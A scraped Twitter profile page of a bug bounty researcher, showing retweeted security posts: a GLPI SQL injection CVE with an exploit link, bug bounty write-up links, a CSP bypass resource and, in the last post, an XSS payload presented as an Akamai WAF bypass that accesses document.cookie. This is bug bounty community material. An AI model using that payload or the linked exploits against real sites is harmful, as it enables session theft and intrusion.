Sayim (@sayim0x) 's Twitter Profile
Sayim

@sayim0x

Cyber Security Researcher || Ethical Hacker || Bug Bounty || Pentester at Yogosha

ID: 1446383266274054147

calendar_today08-10-2021 07:53:48

430 Tweet

1,1K Followers

325 Following

Muhammad Waseem (@wgujjer11) 's Twitter Profile Photo

Pre-Auth SQL Injection CVE-2025-24799 Severity : Critical Exploit : github.com/MuhammadWaseem
 Refrence : github.com/glpi-project/g
 #GLPI #SQLi #CVE202524799

Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
Exploit : github.com/MuhammadWaseem

Refrence : github.com/glpi-project/g


#GLPI #SQLi #CVE202524799
Yogosha (@yogoshaofficial) 's Twitter Profile Photo

🏅 Announcing Yogosha’s Top 10 Security Researchers of the first Quarter 2025 Every day, our platform brings together some of the sharpest minds in Offensive Security and today, we’re shining a light on those who stood out.

🏅 Announcing Yogosha’s Top 10 Security Researchers of the first Quarter 2025

Every day, our platform brings together some of the sharpest minds in Offensive Security and today, we’re shining a light on those who stood out.
black viru5 (@yazeed_oliwah) 's Twitter Profile Photo

My new Finding : Account Takeover & Deletion via Guest Checkout Vulnerability write-up link : blackvirus-blog.pages.dev/web-security-b
 enjoy😁 #BugBounty #bugbountytips #CyberSecurity #redteam #Hacked

André Baptista (@0xacb) 's Twitter Profile Photo

Found an XSS but got blocked by the CSP? cspbypass.com has a compiled list of ways to bypass the Content-Security Policy. Check out the video below 👇

Sayim (@sayim0x) 's Twitter Profile Photo

Sometimes the target scope is listed as *.target.* — meaning any TLD could be in play. 🔍 To quickly check which TLDs are available for that domain, use 👉 instantdomainsearch.com/domain-extensi
 #BugBounty #Recon #InfoSec #Hacking

VIEH Group (@viehgroup) 's Twitter Profile Photo

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> Credit: NullSecurityX #BugBounty #XSS #bugbountytips #infosec

Cross Site Scripting (XSS) Akamai WAF Bypass

try this payload : 
&lt;!--&gt;&lt;svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27&gt;

Credit: <a href="/nullsecurityx/">NullSecurityX</a>
#BugBounty #XSS #bugbountytips #infosec